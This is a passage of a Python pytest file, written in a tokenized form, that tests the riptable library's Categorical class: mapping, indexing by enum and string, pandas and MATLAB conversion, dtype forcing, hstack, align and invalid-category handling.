666.0])<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping invalid=666)<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>result=c.map(mapping)<assert_stmt>np.isnan(result[4])<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping)<assert_stmt>np.isnan(result[4])<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>mapping=FastArray(['w' 'x' 'y' 'z'])<line_sep>result=c.map(mapping)<line_sep>correct=FastArray([b'w' b'w' b'x' b'y' b'z'])<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping)<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical([2 2 3 1 4 0] ['a' 'b' 'c' 'd'])<line_sep>mapping={'a':1.0 'b':2.0 'c':3.0}<line_sep>result=c.map(mapping invalid=666)<line_sep>correct=FastArray([2.0 2.0 3.0 1.0 666.0 666.0])<assert_stmt>bool(np.all(result<eq>correct))<block_end># ---------------------------------------------------------------------------
<def_stmt>test_from_category self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'])<line_sep>bin=c.from_category('a')<assert_stmt>bin<eq>1<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=0)<line_sep>bin=c.from_category(b'a')<assert_stmt>bin<eq>0<with_stmt>pytest.raises(ValueError)<block_start>bin=c.from_category('z')<block_end>c=Categorical(np.arange(5 10))<line_sep>bin=c.from_category(5)<assert_stmt>bin<eq>1<with_stmt>pytest.raises(ValueError)<block_start>bin=c.from_category(100)<block_end>c=Categorical([FastArray(['a' 'b' 'c']) np.arange(3)])<line_sep>bin=c.from_category(('c' 2))<assert_stmt>bin<eq>3<block_end># ---------------------------------------------------------------------------
<def_stmt>test_getitem_enum_int self<block_start>codes=[1 44 44 133 75]<line_sep>correct_strings=['StronglyDisagree' 'StronglyAgree' 'StronglyAgree' 'Agree' 'Disagree' ]<line_sep>c=Categorical(codes LikertDecision)<line_sep># getitem good init
<for_stmt>idx range(5)<block_start><assert_stmt>correct_strings[idx]<eq>c[idx] f"Failed to return correct string for valid index in categorical."<block_end># getitem bad init
<with_stmt>pytest.raises(IndexError)<block_start>result=c[5]<block_end><block_end># ---------------------------------------------------------------------------
<def_stmt>test_getitem_enum_int_list self<block_start>codes=[1 44 44 133 75]<line_sep>correct_strings=['StronglyDisagree' 'StronglyAgree' 'StronglyAgree' 'Agree' 'Disagree' ]<line_sep>c=Categorical(codes LikertDecision)<line_sep>result=c[[1 4]]<assert_stmt>isinstance(result Categorical) f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."<assert_stmt>result[0]<eq>'StronglyAgree'<assert_stmt>result[1]<eq>'Disagree'<line_sep>result=c[np.array([1 4])]<assert_stmt>isinstance(result Categorical) f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."<assert_stmt>result[0]<eq>'StronglyAgree'<assert_stmt>result[1]<eq>'Disagree'<line_sep>result=c[FastArray([1 4])]<assert_stmt>isinstance(result Categorical) f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."<assert_stmt>result[0]<eq>'StronglyAgree'<assert_stmt>result[1]<eq>'Disagree'<block_end><def_stmt>test_getitem_enum self<block_start>self._notimpl()<block_end><def_stmt>test_setitem_enum self<block_start>self._notimpl()<block_end># -------------------------------------------- MATLAB ----------------------------------
<def_stmt>test_ctor_matlab self<block_start>idx_list=[1.0 2.0 3.0 4.0 5.0]<line_sep>str_list=['a' 'b' 'c' 'd' 'e']<with_stmt>pytest.raises(TypeError)<block_start>c=Categorical(idx_list str_list)<block_end>c=Categorical(idx_list str_list from_matlab=<true>)<assert_stmt>c[0]<eq>'a'<assert_stmt>c.dtype<eq>np.dtype(np.int8)<block_end># def test_ctor_matlab_non_unique(self):
# idx_list = [1.0, 2.0, 3.0, 4.0, 5.0]
# str_list = ['a','b','c','d','d']
# with self.assertRaises(ValueError, msg=f"Failed to raise error when MATLab categories were not unique."):
# c = Categorical(idx_list, str_list, from_matlab=True)
# ------------------------------- PANDAS CATEGORICAL ----------------------------------
<def_stmt>test_ctor_pandas_cat self<block_start>idx_list=[0 1 2 3 4]<line_sep>str_list=['a' 'b' 'c' 'd' 'e']<line_sep>pd_c=pd.Categorical.from_codes(idx_list str_list)<line_sep>pd_c=Categorical(pd_c)<line_sep>rt_c=Categorical(idx_list str_list)<line_sep>cats_match=bool(np.all(pd_c.category_array<eq>rt_c.category_array))<assert_stmt>cats_match f"Failed to create matching categories from pandas categorical"<line_sep># idx_match = bool(np.all(pd_c.view(np.ndarray)+1 == rt_c.view(np.ndarray)))
# self.assertTrue(idx_match, msg=f"Failed to create matching unerlying array from pandas categorical")
# convert pandas invalid bytes
pd_c=pd.Categorical.from_codes([-1 0 1 2] ['a' 'b' 'c'])<line_sep>pd_c=Categorical(pd_c)<line_sep>cat_list=pd_c.category_array<assert_stmt>len(cat_list)<eq>3<line_sep>no_negative=bool(np.all(pd_c.view(FastArray)<ge>0))<assert_stmt>no_negative<line_sep># convert pandas invalid unicode
pd_c=pd.Categorical.from_codes([-1 0 1 2] [u'\u2082' u'\u2083' u'\u2084'])<line_sep>pd_c=Categorical(pd_c)<line_sep>cat_list=pd_c.category_array<assert_stmt>len(cat_list)<eq>3<line_sep>no_negative=bool(np.all(pd_c.view(FastArray)<ge>0))<assert_stmt>no_negative<block_end># --------------------------------RIPTABLE CATEGORICAL ----------------------------------------
# def test_ctor_rt_cat(self):
# c_unicode = Categorical(list_unicode)
# c = c_unicode.copy(forceunicode=True)
# self.assertEqual(c._categories_wrap._list.dtype.char, 'U', msg=f"Failed to force unicode on categorical copy.")
# ------------------------------------CUSTOM CATEGORIES ----------------------------------
<def_stmt>test_ctor_list_unique self<block_start>unique_str=['a' 'b' 'c' 'd' 'e' 'f']<line_sep>str_list=['a' 'b' 'c' 'd' 'e']<line_sep>c=Categorical(str_list unique_str)<line_sep>cats_match=bool(np.all(c._categories_wrap._list<eq>unique_str))<assert_stmt>cats_match f"Failed to create matching categories from unique category input."<block_end># ------------------------------------INTEGER ARRAY ----------------------------------
<def_stmt>test_ctor_integer_array self<block_start>lis=[1 4 9 16 25]<line_sep>c=Categorical(lis)<for_stmt>v1,v2 zip(c lis)<block_start><assert_stmt>v1<eq>v2<block_end><block_end># ------------------------------------GARBAGE ----------------------------------
<def_stmt>test_ctor_garbage self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical(1 2)<block_end><block_end># ------------------------------------TEST FORCE DTYPE ----------------------------------
<def_stmt>test_init_with_dtype self<block_start>int_types=[np.int8 np.int16 np.int32 np.int64]<line_sep>float_types=[np.float32 np.float64]<line_sep>uint_types=[np.uint8 np.uint16 np.uint32 np.uint64]<line_sep>arr=['a' 'b' 'c' 'd' 'e']<for_stmt>dt int_types<block_start>c=Categorical(arr dtype=dt)<assert_stmt>c.dtype<eq>dt f"Failed to force the correct dtype {dt} for categorical."<block_end><for_stmt>dt float_types+uint_types<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical(arr dtype=dt)<block_end><block_end><block_end># ------------------------------------TEST CONVERT VALUE-------------------------------------
<def_stmt>test_possibly_convert_value self<block_start>'''
TODO: fix for new Categories class
'''<line_sep>self._notimpl()<block_end><def_stmt>test_categories_bad_init self<block_start>tup=('a' 'b' 'c')<with_stmt>pytest.raises(TypeError)<block_start>cat=Categories(tup)<block_end><block_end><def_stmt>test_categories_len self<block_start>cats_from_list=Categorical(['a' 'b' 'c'] ordered=<true> base_index=1 filter=<none>)._categories_wrap<assert_stmt>len(cats_from_list)<eq>3<line_sep>cats_from_enum=Categorical(FastArray([144]) LikertDecision)._categories_wrap<assert_stmt>len(cats_from_enum)<eq>144<block_end><def_stmt>test_get_categories self<block_start>c_list=['StronglyAgree' 'Agree' 'Disagree' 'StronglyDisagree' 'NeitherAgreeNorDisagree' ]<line_sep>cats_from_list=Categories(c_list unicode=<true>)<line_sep>cats_from_enum=Categories(LikertDecision)<line_sep>get_cats_match=bool(np.all(cats_from_list.get_categories()<eq>cats_from_enum.get_categories()))<assert_stmt>get_cats_match<block_end><def_stmt>test_possibly_add_categories self<block_start>self._notimpl()<line_sep># uniquify and sort
# raise exception for adding cats to intenum, etc.
<block_end><def_stmt>test_categories_preserves_subtype self# Test the Categorical.categories() method preserves the array type for the category data.
# This is important because we want the array(s) returned by this method to have the same type
# as the internal data (i.e. what's returned by Categorical.category_array or Categorical.category_dict).
# Single-key Categorical
<block_start>dates=rt.Date(['2019-03-15' '2019-04-18' '2019-05-17' '2019-06-21' '2019-07-19' '2019-08-16' '2019-09-20' '2019-10-18' '2019-11-15' '2019-12-20' ])<line_sep>dates.name='dates'<line_sep>dates_cat=rt.Cat(dates)<line_sep>cats=dates_cat.categories()<assert_stmt>type(dates)<eq>type(cats)<line_sep># Multi-key Categorical
datestrs=rt.FA(['2019-03-15' '2019-04-18' '2019-05-17' '2019-06-21' '2019-07-19' '2019-08-16' '2019-09-20' '2019-10-18' '2019-11-15' '2019-12-20' ])<line_sep>datestrs.name='datestrs'<line_sep>mcat=rt.Cat([dates datestrs])<line_sep>mcats=mcat.categories()<assert_stmt>type(mcats['key_0'])<eq>type(dates)<assert_stmt>type(mcats['key_1'])<eq>type(datestrs)<line_sep># Empty single-key Categorical
dates=rt.Date([])<line_sep>dates_cat=rt.Cat(dates)<line_sep>cats=dates_cat.categories()<assert_stmt>type(dates)<eq>type(cats)<block_end><def_stmt>test_make_unique self# SJK: changed this test on 8/21/2018 - count now comes from the grouping object, not Categories.make unique
<block_start>values=FastArray(['a' 'b' 'c' 'c' 'd' 'a' 'b'])<line_sep># c = Categories([],base_index=1)
# index, cat_len, filter = c.make_unique(values)
cat=Categorical(values ordered=<true> base_index=1 filter=<none>)<line_sep>index=cat._fa<line_sep>c=cat._categories_wrap<assert_stmt>len(index)<eq>7<assert_stmt>max(index)<eq>4<assert_stmt>c._mode<eq>CategoryMode.StringArray<assert_stmt>c._list.dtype.char<eq>'S'<assert_stmt>c.isbytes<line_sep>univals=values.astype('U')<line_sep>cat=Categorical(univals ordered=<true> base_index=1 filter=<none> unicode=<true>)<line_sep>index=cat._fa<line_sep>c=cat._categories_wrap<assert_stmt>len(index)<eq>7<assert_stmt>max(index)<eq>4<assert_stmt>c._mode<eq>CategoryMode.StringArray<assert_stmt>c._list.dtype.char<eq>'U'<assert_stmt>c.isunicode<block_end>@pytest.mark.xfail(reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.')<def_stmt>test_force_base_index self<block_start>filter=FastArray([<true> <true> <false> <false> <true>])<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'])<assert_stmt>c.base_index<eq>1 'Did not default base index to 1'<assert_stmt>c._fa[0]<eq>1 'Did not default base index to 1'<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=0)<assert_stmt>c.base_index<eq>0 'Did not force base index to 0'<assert_stmt>c._fa[0]<eq>0 'Did not force base index to 0'<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] filter=filter)<assert_stmt>len(c.category_array)<eq>1<assert_stmt>c._fa[2]<eq>0 'Did not default base index to 1'<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=0 filter=filter)<assert_stmt>len(c.category_array)<eq>1<assert_stmt>c._fa[2]<eq>INVALID_DICT[c.dtype.num] 'Did not force base index to 0'<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=99 filter=filter)<block_end>c=Categorical(['a' 'a' 'b' 'c' 'a'] ['a' 'b' 'c'])<assert_stmt>c.base_index<eq>1 'Did not default base index to 1'<assert_stmt>c._fa[0]<eq>1 'Did not default base index to 1'<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] ['a' 'b' 'c'] base_index=0)<assert_stmt>c.base_index<eq>0 'Did not force base index to 0'<assert_stmt>c._fa[0]<eq>0 'Did not force base index to 0'<with_stmt>pytest.raises(NotImplementedError)<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'] ['a' 'b' 'c'] base_index=0 filter=filter)<block_end><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical([1.0 2.0 3.0] ['a' 'b' 'c'] from_matlab=<true> base_index=0)<block_end>pdc=pd.Categorical(['a' 'a' 'b' 'c' 'a'])<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(pdc base_index=0)<block_end><block_end><def_stmt>test_is_in_unique_strings self<block_start>values=['a' 'b' 'c' 'c' 'd' 'a' 'b']<line_sep>good_cats=['a' 'b' 'c' 'd']<line_sep>incomplete_cats=['a' 'b' 'c']<line_sep>bad_cats=['a' 'a' 'b']<line_sep>invalid='invalid'<line_sep>###--------REMOVED from_provided_categories, rewrite these tests to go through main constructor
# valid bytes
c=Categorical(values good_cats ordered=<true> base_index=1 unicode=<false> filter=<none>)<line_sep>cats=c._categories_wrap<assert_stmt>len(c)<eq>7<assert_stmt>max(c._fa)<eq>4<assert_stmt>cats._mode<eq>CategoryMode.StringArray<assert_stmt>cats._list.dtype.char<eq>'S'<assert_stmt>cats.isbytes<line_sep># valid unicode
c=Categorical(values good_cats ordered=<true> base_index=1 unicode=<true> filter=<none>)<line_sep>cats=c._categories_wrap<assert_stmt>len(c)<eq>7<assert_stmt>max(c._fa)<eq>4<assert_stmt>cats._mode<eq>CategoryMode.StringArray<assert_stmt>cats._list.dtype.char<eq>'U'<assert_stmt>cats.isunicode<line_sep># non-unique categories
# 4/12/2019 - no longer checks for uniqueness
# with self.assertRaises(ValueError):
# c = Categories.from_provided_categories(values, bad_cats, ordered=True, base_index=1, unicode=False, filter=None)
# not all values found in categories
<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(values incomplete_cats ordered=<true> base_index=1 unicode=<false> filter=<none> )<block_end># insert invalid True
# 5/16/2019 invalid must appear in provided uniques
<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(values incomplete_cats ordered=<true> base_index=1 unicode=<true> filter=<none> invalid=invalid )<line_sep>cats=c._categories_wrap<assert_stmt>len(c)<eq>7<assert_stmt>max(c._fa)<eq>3<assert_stmt>cats._mode<eq>CategoryMode.StringArray<assert_stmt>cats._list.dtype.char<eq>'U'<assert_stmt>cats.isunicode<block_end><block_end><def_stmt>test_getitem_enum_str self<block_start>codes=[1 44 44 133 75]<line_sep>correct=[<true> <false> <false> <false> <false>]<line_sep>valid_str='StronglyDisagree'<line_sep>invalid_str='q'<line_sep>c=Categorical(codes LikertDecision)<line_sep># with self.assertRaises(IndexError):
mask=c[valid_str]<line_sep>is_correct=bool(np.all(mask<eq>correct))<assert_stmt>is_correct<with_stmt>pytest.raises(ValueError)<block_start>mask=c[invalid_str]<assert_stmt>sum(mask)<eq>0<block_end><block_end><def_stmt>test_match_str_to_category self<block_start>single_byte=b'a'<line_sep>single_unicode='a'<line_sep>single_true_unicode=u'\u2082'<line_sep>byte_values=[b'a' b'b' b'c' b'c' b'd' b'a' b'b']<line_sep>values=FastArray(['a' 'b' 'c' 'c' 'd' 'a' 'b'])<line_sep>true_unicode=[u'\u2082' u'\u2083' u'\u2082']<line_sep># 4/25/2019 - changed these tests to construct a Categorical, rather than
# a Categories object directly. Categorical will always make a Categories object.
# (held in _categories_wrap)
c=Categorical(values ordered=<true> base_index=1 filter=<none>)<line_sep>matching_char=c._categories_wrap.match_str_to_category(single_unicode)<assert_stmt>isinstance(matching_char bytes)<with_stmt>pytest.raises(TypeError)<block_start>matching=c._categories_wrap.match_str_to_category(single_true_unicode)<block_end>univals=np.array(['a' 'b' 'c' 'c' 'd' 'a' 'b'])<line_sep>c=Categorical(univals ordered=<true> base_index=1 filter=<none> unicode=<true>)<line_sep>matching_char=c._categories_wrap.match_str_to_category(single_byte)<assert_stmt>isinstance(matching_char str)<line_sep>c=Categorical(values ordered=<true> base_index=1 filter=<none>)<line_sep>matching=c._categories_wrap.match_str_to_category(values)<assert_stmt>matching.dtype.char<eq>'S'<with_stmt>pytest.raises(TypeError)<block_start>matching=c._categories_wrap.match_str_to_category(true_unicode)<block_end>c=Categorical(univals ordered=<true> base_index=1 filter=<none> unicode=<true>)<line_sep>matching=c._categories_wrap.match_str_to_category(values)<assert_stmt>matching.dtype.char<eq>'U'<block_end># Categories object being removed
# Disabling these tests - methods will move into Categorical
# 4/24/2019
# def test_get_category_index(self):
# values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'])
# _, c, _, _ = Categories.from_array(values, ordered=True, base_index=1, filter=None)
# # when found, will return exact index
# str_idx = c.get_category_index('b')
# self.assertEqual(str_idx, 2)
# # when ordered, will return floating point for LTE GTE
# str_idx = c.get_category_index('e')
# self.assertEqual(str_idx, 4.5)
# # when unordered, will return invalid index (length of string array)
# c._sorted = False
# str_idx = c.get_category_index('e')
# self.assertEqual(str_idx, 6)
# def test_get_category_match_index(self):
# values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'])
# _, c, _, _ = Categories.from_array(values, ordered=False, base_index=1, filter=None)
# string_matches = c.get_category_match_index(['a','b'])
# self.assertEqual(string_matches, [1,2])
# c._mode = CategoryMode.IntEnum
# with self.assertRaises(NotImplementedError):
# string_matches = c.get_category_match_index(['a','b'])
<def_stmt>test_possibly_invalid self<block_start>values=['a' 'b' 'c' 'c' 'd' 'a' 'b' 'g']<line_sep>c=Categorical(values base_index=1)<line_sep>out_of_range=-50<line_sep>sentinel=INVALID_DICT[c.dtype.num]<line_sep>c.view(FastArray)[0]=out_of_range<line_sep># c.view(FastArray)[1] = sentinel
# **changed invalid, all will display as bad code if changed underneath and not in range
<assert_stmt>c[0]<eq>"!<-50>"<line_sep># self.assertEqual(c[1], "!<inv>")
<block_end><def_stmt>test_categories_getitem_str_list self<block_start>codes=[1 44 44 133 75]<line_sep>correct=FastArray([<false> <true> <true> <false> <true>])<line_sep>c=Categorical(codes LikertDecision)<line_sep>mask=c[['StronglyAgree' 'Disagree']]<line_sep>is_correct=bool(np.all(mask<eq>correct))<assert_stmt>is_correct<line_sep>mask=c[[b'StronglyAgree' b'Disagree']]<line_sep>is_correct=bool(np.all(mask<eq>correct))<assert_stmt>is_correct<block_end><def_stmt>test_categories_print_repr self<block_start>self._notimpl()<block_end><def_stmt>test_enum_dict_warning self<block_start><class_stmt>DupeEnum(IntEnum)<block_start>code_a=1<line_sep>code_b=1<line_sep>code_c=1<line_sep>code_d=2<block_end><with_stmt>pytest.warns(UserWarning)<block_start>c=Categorical([1 2] DupeEnum)<block_end><block_end># ------------------------- TEST MERGE -------------------------------------------
# def test_merge(self):
# from riptable.rt_categorical import categorical_merge
# c_bytes = Categorical(['b','b','b','a','b','b'], ['a','b'])
# c_unicode = Categorical(["AAPL\u2080","AMZN\u2082"])
# result = categorical_merge([c_bytes, c_unicode])
# # self.assertTrue(result[0]._categories_wrap._list is result[1]._categories_wrap._list, msg=f"Categorical merge did not assign the same dictionary to both arrays.")
# self.assertEqual(result[0]._categories_wrap._list.dtype.char, 'U', msg=f"{result[0]._categories_wrap._list.dtype.char} was not 'U'. dictionary was not flipped to unicode.")
# for item in c_bytes._categories_wrap._list:
# self.assertTrue(item.decode() in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories")
# for item in c_unicode._categories_wrap._list:
# self.assertTrue(item in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories")
# c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True)
# c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True)
# [cm1, cm2] = categorical_merge([c1, c2])
# self.assertTrue((cm1 == [1, 1, 3, 2, 2]).all())
# self.assertTrue((cm2 == [2, 2, 4, 4, 3]).all())
# ------------------------- TEST HSTACK -------------------------------------------
<def_stmt>test_hstack self<block_start>c1=Categorical(['a' 'a' 'c' 'b' 'b'])<line_sep>c2=Categorical(['b' 'b' 'd' 'd' 'c'])<line_sep>cm=Categorical.hstack([c1 c2])<assert_stmt>(cm.as_string_array<eq>['a' 'a' 'c' 'b' 'b' 'b' 'b' 'd' 'd' 'c']).all()<line_sep>c1=Categorical([1 1 3 2 2] [1 2 3 4 5] from_matlab=<true>)<line_sep>c2=Categorical([2 2 4 4 3] [1 2 3 4 5] from_matlab=<true>)<line_sep>cm=Categorical.hstack([c1 c2])<assert_stmt>(cm<eq>[1 1 3 2 2 2 2 4 4 3]).all()<block_end><def_stmt>test_hstack_fails_for_different_mode_cats self# Create a dictionary-mode Categorical (from ISO3166 data).
# The dictionary is created manually below instead of using e.g.
# {k: int(v) for (k, v) in ISOCountryCode.__members__.items()}
# so the dictionary we give to Categorical does not have the insert ordering
# imply an ordering of the keys/values.
<block_start>country_code_dict={'IRL':372 'USA':840 'AUS':36 'HKG':344 'JPN':392 'MEX':484 'KHM':116 'THA':764 'JAM':388 'ARM':51}<line_sep># The values for the Categorical's backing array.
# This includes some value(s) not in the dictionary and not all values in the dictionary are used here.
country_num_codes=[36 36 344 840 840 372 840 372 840 124 840 124 36 484]<line_sep>cat1=rt.Categorical(country_num_codes country_code_dict)<assert_stmt>cat1.category_mode<eq>CategoryMode.Dictionary<line_sep># Create a single-key, string-mode Categorical.
cat2=rt.Categorical(['AUS' 'AUS' 'HKG' 'USA' 'USA' 'IRL' 'USA' 'IRL' 'USA' 'KHM' 'IRL' 'AUS' 'MEX'])<assert_stmt>cat2.category_mode<ne>CategoryMode.Dictionary<line_sep># Try to hstack the two Categoricals. This should fail due to the CategoryMode values being different.
<with_stmt>pytest.raises((ValueError TypeError))<block_start>rt.hstack([cat1 cat2])<block_end><block_end><def_stmt>test_align self<block_start>c1=Categorical(['a' 'b' 'c'])<line_sep>c2=Categorical(['d' 'e' 'f'])<line_sep>c3=Categorical(['c' 'f' 'z'])<line_sep>cm=Categorical.align([c1 c2 c3])<assert_stmt>(cm[0].as_string_array<eq>['a' 'b' 'c']).all()<assert_stmt>(cm[1].as_string_array<eq>['d' 'e' 'f']).all()<assert_stmt>(cm[2].as_string_array<eq>['c' 'f' 'z']).all()<assert_stmt>(cm[0].categories()<eq>FastArray([b'Filtered' b'a' b'b' b'c' b'd' b'e' b'f' b'z'])).all()<assert_stmt>(cm[0].categories()<eq>cm[1].categories()).all()<assert_stmt>(cm[0].categories()<eq>cm[2].categories()).all()<line_sep>c1=Categorical([1 1 3 2 2] [1 2 3 4 5] from_matlab=<true>)<line_sep>c2=Categorical([2 2 4 4 3] [1 2 3 4 5] from_matlab=<true>)<line_sep>cm=Categorical.align([c1 c2])<assert_stmt>(cm[0]<eq>[1 1 3 2 2]).all()<assert_stmt>(cm[1]<eq>[2 2 4 4 3]).all()<line_sep># Multikey with nested Categorical
c1=Categorical([Categorical(['a']) FastArray([1])])<line_sep>c2=Categorical([Categorical(['b']) FastArray([2])])<line_sep>cm=Categorical.align([c1 c2])<assert_stmt>cm[0][0]<eq>('a' 1)<assert_stmt>cm[1][0]<eq>('b' 2)<assert_stmt>cm[0].category_dict<eq>cm[1].category_dict<block_end><def_stmt>test_categorical_merge_dict self<block_start><import_from_stmt>riptable.rt_categorical categorical_merge_dict<line_sep>d1={'a':1 'b':2 'c':3 'd':4 'e':5}<line_sep>d2={'a':1 'e':5 'b':2 'f':6}<line_sep>c1=Categorical([3 3 4 3 1 2 5] d1)<line_sep>c2=Categorical([1 1 5 2 2 1 5] d2)<line_sep>combined=categorical_merge_dict([c1 c2] return_type=dict)<for_stmt>i range(1 6)<block_start><assert_stmt>i<in>combined.values()<block_end><block_end><def_stmt>test_getitem_empty self<block_start>c=Categorical([0 1 2] ['a' 'b' 'c'])<line_sep>empty_list=c[[]]<assert_stmt>isinstance(empty_list Categorical)<line_sep>dict_matches=bool(np.all(empty_list.categories()<eq>c.categories()))<assert_stmt>dict_matches<with_stmt>pytest.raises(IndexError)<block_start>empty_np=c[np.array([])]<assert_stmt>isinstance(empty_np Categorical)<line_sep>dict_matches=bool(np.all(empty_np.categories()<eq>c.categories()))<assert_stmt>dict_matches<block_end><block_end><def_stmt>test_iter_groups self<block_start>correct_keys=FastArray(['a' 'b' 'c' 'd' 'e'])<line_sep>correct_idx=[[8] [3] [5 6] [2 9] [0 1 4 7]]<line_sep>str_arr=FastArray(['e' 'e' 'd' 'b' 'e' 'c' 'c' 'e' 'a' 'd'])<line_sep>c=Categorical(str_arr)<for_stmt>i,tup enumerate(c.iter_groups())<block_start><assert_stmt>tup[0]<eq>correct_keys[i]<assert_stmt>bool(np.all(tup[1]<eq>correct_idx[i]))<block_end><block_end><def_stmt>test_enum_dict_multi self<block_start>self._notimpl()<line_sep># not implemented
<block_end><def_stmt>test_enum_init_errors self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical(['a' 'b' 'c'] LikertDecision)<block_end><block_end><def_stmt>test_custom_invalid_category self# 5/16/2019 invalid must appear in provided uniques
<block_start>c=Categorical(['a' 'b' 'c' 'my_invalid'] ['a' 'b' 'c' 'my_invalid'] invalid='my_invalid' base_index=1 )<assert_stmt>c[3]<eq>'my_invalid'<assert_stmt>c.isnan()[3]<assert_stmt>len(c.category_array)<eq>4<block_end>@pytest.mark.xfail(reason="After invalid_set, the custom invalid value is not displayed.")<def_stmt>test_invalid_set self<block_start>c=Categorical(['a' 'b' 'c' 'my_invalid'] ['a' 'b' 'c' 'my_invalid'] invalid='my_invalid' base_index=1 )<line_sep># set a new string to be displayed for invalid items and validate
custom_invalid="custom_invalid"<line_sep>c.invalid_set(custom_invalid)<assert_stmt>c[3]<eq>custom_invalid<assert_stmt>c.isnan()[3]<assert_stmt>len(c.category_array)<eq>4<block_end><def_stmt>test_lock_unlock self<block_start>self._notimpl()<line_sep># halfway implemented
<block_end><def_stmt>test_set_item self<block_start>self._notimpl()<line_sep># when index needs to be fixed after categories are added
# setitem with integer / invalid integer
# setitem with string / invalid category
<block_end><def_stmt>test_return_empty_cat self<block_start>self._notimpl()<line_sep># this code still needs to get written
<block_end><def_stmt>test_getitem_np_str self<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'])<line_sep>correct=FastArray([<true> <true> <true> <true> <false> <false> <true>])<with_stmt>pytest.raises(IndexError)<block_start>result=c[np.array(['a' 'b'])]<block_end># self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings")
<with_stmt>pytest.raises(IndexError)<block_start>result=c[np.array(['a' 'b']).astype('S')]<block_end># self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings")
<block_end><def_stmt>test_getitem_slice self<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'])<line_sep>result=c[:3]<assert_stmt>isinstance(result Categorical)<line_sep>match_fa=bool(np.all(result.view(FastArray)<eq>[1 1 2]))<assert_stmt>match_fa<assert_stmt>len(result)<eq>3<assert_stmt>len(result._categories_wrap)<eq>3<block_end><def_stmt>test_categorical_compare_check self<block_start>self._notimpl()<line_sep># Categories have different modes
# categories are both enum
# compare cat to empty list
# non-categorical input
# convert all to unicode if one is unicode
<block_end># this keyword wasn't used anywhere, removed from copy()
# def test_copy_invalid(self):
# c = Categorical(['a','a','b','a','c','c','b'])
# invalid_copy = c.copy(fill_invalid=True)
# all_invalid = bool(np.all(invalid_copy.view(FastArray)==-128))
# self.assertTrue(all_invalid)
# for idx, item in enumerate(c.categories()):
# self.assertEqual(item, invalid_copy.categories()[idx])
# self.assertFalse(c.categories() is invalid_copy.categories())
<def_stmt>test_fill_invalid self<block_start>values=list('aabaccb')<line_sep>c=Categorical(values base_index=1)<line_sep>c.fill_invalid(inplace=<true>)<line_sep>assert_array_equal(FastArray([c.filtered_name]<times>len(values)) c.expand_array)<line_sep>assert_array_equal(FastArray([0]<times>len(values)) c._fa)<line_sep>expected=FastArray(sorted(set(values))).astype('|S1')<line_sep>assert_array_equal(expected c.category_array)<line_sep>assert_array_equal(expected c.category_dict[next(iter(c.category_dict))])<block_end># values of first key
<def_stmt>test_force_unicode self<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'] unicode=<true>)<line_sep>result_dtype=c.categories().dtype.char<assert_stmt>result_dtype<eq>'U' f"Failed to force unicode when constructing categorical from list of string values"<block_end><def_stmt>test_categories_shallow_copy self<block_start>codes=[10 10 20 10 30 20 10]<line_sep>d={10:'a' 20:'b' 30:'c'}<line_sep>c=Categorical(codes d)<line_sep>original_cats=c._categories_wrap<line_sep>new_cats=original_cats.copy(deep=<false>)<assert_stmt>(original_cats._str_to_int_dict<is>new_cats._str_to_int_dict) f"Categories did not use same str_to_int dictionary after shallow copy."<assert_stmt>(original_cats._int_to_str_dict<is>new_cats._int_to_str_dict) f"Categories did not use same int_to_str dictionary after shallow copy."<block_end># 5/16/2019 invalid category must be in user provided
# def test_two_lists_invalid(self):
# c = Categorical(['a','a','b','a','c','c','b'],np.array(['a','b']), invalid='inv', base_index=1)
# self.assertEqual(c[4],FILTERED_LONG_NAME)
@pytest.mark.xfail(reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.')<def_stmt>test_getitem_enum_list self<block_start>c=Categorical([44 133 133 75 144 1] LikertDecision)<with_stmt>pytest.raises(IndexError)<block_start>result=c[[b'NeitherAgreeNorDisagree']]<block_end>correct=FastArray([<false> <false> <false> <false> <true> <false>])<line_sep># self.assertTrue(array_equal(result, correct))
